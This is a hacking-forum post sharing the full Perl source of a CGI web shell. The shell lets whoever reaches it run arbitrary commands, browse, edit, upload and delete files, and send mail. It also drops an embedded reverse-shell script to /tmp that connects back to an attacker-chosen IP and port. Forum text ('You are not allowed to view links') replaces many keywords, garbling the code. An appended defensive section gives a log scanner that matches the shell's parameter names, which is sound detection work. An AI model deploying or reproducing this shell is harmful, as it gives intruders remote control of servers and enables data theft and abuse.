[Perl] CGI Shell

BigBear
« on: July 03, 2011, 09:38:00 pm »
Hello everyone

Today I finished writing a CGI shell. These shells are used on sites that allow CGI files to be executed and have a cgi-bin directory.

This shell has the following options:

* List directories
* View and edit files
* Delete files and directories
* ReverseShell
* Upload files to a specified directory
* Execute commands
* Send mail

Code: Perl
  1. #!"\xampp\perl\bin\perl.exe"
  2. #
  3. #CGI Shell 0.1
  4. #
  5. #(C) Doddy Hackman 2011
  6. #
  7. #
  8.  
  9. use CGI;
  10. use Cwd;
  11. use HTML::Entities;
  12. use Net::SMTP;
  13.  
  14. my %rta;
  15.  
  16. my $que = new CGI;
  17. my @ques = $que->param;
  18.  
  19. for(@ques) {
  20. $rta{$_} = $que->param($_);
  21. }
  22.  
  23.  
  24. You are not allowed to view links. Register or Login "Content-type:text/html\n\n";
  25. You are not allowed to view links. Register or Login "
  26.  
  27. <style type=text/css>
  28.  
  29.  
  30. .main {
  31. margin                  : -287px 0px 0px -490px;
  32. border                  : White solid 1px;
  33. BORDER-COLOR: #00FF00;
  34. }
  35.  
  36.  
  37. #pie {
  38. position: absolute;
  39. bottom: 0;
  40. }
  41.  
  42. body,a:link {
  43. background-color: #000000;
  44. color:#00FF00;
  45. Courier New;
  46. cursor:crosshair;
  47. font-size: small;
  48. }
  49.  
  50. input,table.outset,table.bord,table,textarea,select {
  51. font: normal 10px Verdana, Arial, Helvetica,
  52. sans-serif;
  53. background-color:black;color:#00FF00;
  54. border: solid 1px #00FF00;
  55. border-color:#00FF00
  56. }
  57.  
  58. a:link,a:visited,a:active {
  59. color: #00FF00;
  60. font: normal 10px Verdana, Arial, Helvetica,
  61. sans-serif;
  62. text-decoration: none;
  63. }
  64.  
  65. </style>
  66.  
  67. <title>CGI Shell (C) Doddy Hackman 2011</title>
  68. <h2><center>CGI Shell</center></h2>
  69.  
  70. ";
  71.  
  72. if ($rta{'filex'}) {
  73.  
  74. You are not allowed to view links. Register or Login FILE ,">>".$rta{'todir'}."/".$rta{'filex'};
  75. while($bytes = You are not allowed to view links. Register or Login($rta{'filex'},$todo, 1024)) {
  76. You are not allowed to view links. Register or Login FILE $todo;
  77. }
  78. You are not allowed to view links. Register or Login FILE;
  79.  
  80. You are not allowed to view links. Register or Login "<script>alert('File Uploaded');</script>";
  81.  
  82. }
  83.  
  84. if ($rta{'codefile'}) {
  85.  
  86. You are not allowed to view links. Register or Login($rta{'filecode'});
  87.  
  88. You are not allowed to view links. Register or Login (FILE,">>".$rta{'filecode'});
  89. You are not allowed to view links. Register or Login FILE $rta{'codefile'}."\n";
  90. You are not allowed to view links. Register or Login FILE;
  91.  
  92. You are not allowed to view links. Register or Login "<script>alert('File Changed');</script>";
  93.  
  94. }
  95.  
  96. if ($rta{'loadfile'}) {
  97. You are not allowed to view links. Register or Login "<form action='' method=POST>";
  98. You are not allowed to view links. Register or Login "<br><h2><center>File ".$rta{'loadfile'}."</h2></center><br><br>";
  99.  
  100. if (-f $rta{'loadfile'}) {
  101.  
  102. You are not allowed to view links. Register or Login "<center><textarea name=codefile cols=70 rows=70>";
  103.  
  104. You are not allowed to view links. Register or Login (FILE,$rta{'loadfile'});
  105. @words = <FILE>;
  106. You are not allowed to view links. Register or Login FILE;
  107.  
  108. for (@words) {
  109. You are not allowed to view links. Register or Login HTML::Entities::encode($_);
  110. }
  111. You are not allowed to view links. Register or Login "
  112. </textarea></center>
  113. <input type=hidden name=filecode value=".$rta{'loadfile'}.">
  114. <br><br><center><input type=submit value=Save></center><br><br>
  115. </form>
  116. ";
  117.  
  118. You are not allowed to view links. Register or Login(1);
  119. }
  120. }
  121.  
  122. You are not allowed to view links. Register or Login "
  123. <br><br>
  124. <b>Console</b>
  125. <br><br>
  126. <fieldset>";
  127.  
  128.  
  129. if ($rta{'cmd'}) {
  130. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login($rta{'cmd'});
  131. }
  132.  
  133. elsif ($rta{'mail'}) {
  134.  
  135. my $send = Net::SMTP->new("localhost",Hello => "localhost",Timeout=>10) or You are not allowed to view links. Register or Login("[-] Error");
  136. $send->mail($rta{'mail'});
  137. $send->to($rta{'to'});  
  138. $send->data();
  139. $send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n");
  140. $send->dataend();
  141. $send->quit();
  142.  
  143. }
  144.  
  145.  
  146. elsif ($rta{'loadir'}) {
  147.  
  148. if (-d $rta{'loadir'}) {
  149.  
  150. You are not allowed to view links. Register or Login DIR,$rta{'loadir'};
  151. my @archivos = You are not allowed to view links. Register or Login DIR;
  152. You are not allowed to view links. Register or Login DIR;
  153.  
  154. for(@archivos) {
  155. if (-d $_) {
  156. You are not allowed to view links. Register or Login "<b>".$_."</b><br>";      
  157. } else {
  158. You are not allowed to view links. Register or Login $_."<br>";
  159. }}}}
  160.  
  161. elsif (-f $rta{'delfile'}) {
  162. if (You are not allowed to view links. Register or Login($rta{'delfile'})) {
  163. You are not allowed to view links. Register or Login "<script>alert('File Deleted');</script>";
  164. } else {
  165. You are not allowed to view links. Register or Login "<script>alert('Error');</script>";
  166. }
  167. }
  168.  
  169. elsif (-d $rta{'deldir'}) {
  170. if (You are not allowed to view links. Register or Login($rta{'deldir'})) {
  171. You are not allowed to view links. Register or Login "<script>alert('Directory Deleted');</script>";
  172. } else {
  173. You are not allowed to view links. Register or Login "<script>alert('Error');</script>";
  174. }
  175. }
  176.  
  177. elsif ($rta{'ipconnect'}) {
  178.  
  179. $code = '
  180. #!usr/bin/perl
  181. #Reverse Shell 0.1
  182. #By Doddy H
  183.  
  184. use IO::Socket;
  185.  
  186. print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";
  187.  
  188. unless (@ARGV == 2) {
  189. print "[Sintax] : $0 <host> <port>\n\n";
  190. exit(1);
  191. } else {
  192. print "[+] Starting the connection\n";
  193. print "[+] Enter in the system\n";
  194. print "[+] Enjoy !!!\n\n";
  195. conectar($ARGV[0],$ARGV[1]);
  196. tipo();
  197. }
  198.  
  199. sub conectar {
  200. socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
  201. connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
  202. open (STDIN,">&REVERSE");
  203. open (STDOUT,">&REVERSE");
  204. open (STDERR,">&REVERSE");
  205. }
  206.  
  207. sub tipo {
  208. print "\n[*] Reverse Shell Starting...\n\n";
  209. if ($^O =~/Win32/ig) {
  210. infowin();
  211. system("cmd.exe");
  212. } else {
  213. infolinux();
  214. #root();  
  215. system("export TERM=xterm;exec sh -i");
  216. }
  217. }
  218.  
  219. sub infowin {
  220. print "[+] Domain Name : ".Win32::DomainName()."\n";
  221. print "[+] OS Version : ".Win32::GetOSName()."\n";
  222. print "[+] Username : ".Win32::LoginName()."\n\n\n";
  223. }
  224.  
  225. sub infolinux {
  226. print "[+] System information\n\n";
  227. system("uname -a");
  228. print "\n\n";
  229. }
  230.  
  231. #The End
  232. ';
  233.  
  234. if ($^O =~/Win32/ig) {
  235. You are not allowed to view links. Register or Login (FILE,">>"."back.pl");
  236. You are not allowed to view links. Register or Login("back.pl","777");
  237. } else {
  238. You are not allowed to view links. Register or Login (FILE,">>"."/tmp/back.pl");
  239. You are not allowed to view links. Register or Login("/tmp/back.pl","777");
  240. }
  241.  
  242. You are not allowed to view links. Register or Login FILE $code;
  243. You are not allowed to view links. Register or Login FILE;
  244.  
  245. if ($^O == "MSWin32") {
  246. You are not allowed to view links. Register or Login("back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
  247. } else {
  248. You are not allowed to view links. Register or Login("cd /tmp;back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
  249. }
  250. } else {
  251.  
  252. You are not allowed to view links. Register or Login DIR,getcwd();
  253. my @archivos = You are not allowed to view links. Register or Login DIR;
  254. You are not allowed to view links. Register or Login DIR;
  255.  
  256. for(@archivos) {
  257. if (-d $_) {
  258. You are not allowed to view links. Register or Login "<b>".$_."</b><br>";      
  259. } else {
  260. You are not allowed to view links. Register or Login $_."<br>";
  261. }}
  262.  
  263. }
  264.  
  265. You are not allowed to view links. Register or Login "</fieldset>
  266. <br><br>
  267. <form action='' method=GET>
  268. <b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
  269. </form>
  270. <form action='' method=GET>
  271. <B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
  272. </form>
  273. <form action='' method=GET>
  274. <b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
  275. </form>
  276. <form action='' method=GET>
  277. <b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
  278. </form>
  279. <form action='' method=GET>
  280. <b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
  281. </form>
  282. <form enctype='multipart/form-data' method=POST>
  283. <br><b>Upload File</b> : <input type=file name=filex><br><br>
  284. <b>To dir</b> : <input type=text name=todir value=".getcwd()."><br><br>
  285. <input type=submit value=Upload>
  286. </form>
  287. <br><B>Mailer</b><br><br>
  288. <form action='' method=GET>
  289. <b>Mail</b> : <input type=text name=mail><br>
  290. <b>To</b> : <input type=text name=to><br>
  291. <b>Subject</B> : <input type=text name=subject><br>
  292. <B>Body</B> : <input type=text name=body><br><br>
  293. <input type=submit value=Send>
  294. </form>
  295. <br><br><b>ReverseShell</b><br><br>
  296. <form action='' method=GET>
  297. <b>IP</B> : <input type=text name=ipconnect><br>
  298. <b>Port</B> : <input type=text name=port><br>
  299. <br><input type=submit value=Connect></form><br><br>
  300.  
  301. ";
  302.  
  303.  
  304. # ¿ The End ?
  305.  

If you want to download it from SourceForge:

Code:
https://sourceforge.net/projects/cgishellx/
« Last edit: March 14, 2015, 09:57:46 am by Expermicid »
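
For defenders, the form fields in the script above double as request-level indicators. The following is an added example, not part of the original post: a Python scan of web server access-log lines for CGI requests that use those GET parameter names. The log format, the CGI path convention, the sample lines and the script name `x.cgi` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# GET parameter names taken from the forms in the posted script.
SHELL_PARAMS = {"cmd", "loadir", "loadfile", "delfile", "deldir", "ipconnect"}
# Generic on their own; only counted when all four arrive together.
MAILER_PARAMS = {"mail", "to", "subject", "body"}
# Assumption: CGI scripts live under /cgi-bin/ or end in .cgi / .pl.
CGI_PATH = re.compile(r"^/cgi-bin/|\.(?:cgi|pl)$", re.IGNORECASE)
# Common/combined log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} ')


def suspicious_requests(lines):
    """Return (client, path, reasons) for CGI requests whose query string
    uses the parameter names of the shell's forms."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-request line
        client, target = m.groups()
        parts = urlsplit(target)
        if not CGI_PATH.search(parts.path):
            continue  # e.g. /app/index.php?cmd=list is out of scope
        names = set(parse_qs(parts.query, keep_blank_values=True))
        reasons = sorted(names & SHELL_PARAMS)
        if MAILER_PARAMS <= names:
            reasons.append("mailer")
        if reasons:
            hits.append((client, parts.path, reasons))
    return hits


# Constructed sample lines (documentation-range IPs, hypothetical script name).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jul/2011:21:40:01 +0000] "GET /cgi-bin/x.cgi?cmd=ver HTTP/1.1" 200 4312',
    '198.51.100.7 - - [03/Jul/2011:21:41:10 +0000] "GET /cgi-bin/x.cgi?ipconnect=203.0.113.9&port=4444 HTTP/1.1" 200 4100',
    '192.0.2.15 - - [03/Jul/2011:21:42:00 +0000] "GET /app/index.php?cmd=list HTTP/1.1" 200 900',
    '192.0.2.15 - - [03/Jul/2011:21:43:30 +0000] "GET /cgi-bin/x.cgi?mail=a%40example.com&to=b%40example.com&subject=hi&body=test HTTP/1.1" 200 4100',
    '192.0.2.44 - - [03/Jul/2011:21:44:00 +0000] "GET /cgi-bin/printenv.pl HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, path, reasons in suspicious_requests(SAMPLE_LOG):
        print(f"{client} {path} -> {', '.join(reasons)}")
```

The upload and file-edit forms use POST, so their fields (`filex`, `todir`, `codefile`, `filecode`) do not appear in a query string and need request-body logging or a WAF rule. The script also writes `back.pl` to `/tmp` (or to the working directory on Windows), which file-integrity monitoring can watch for.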

 
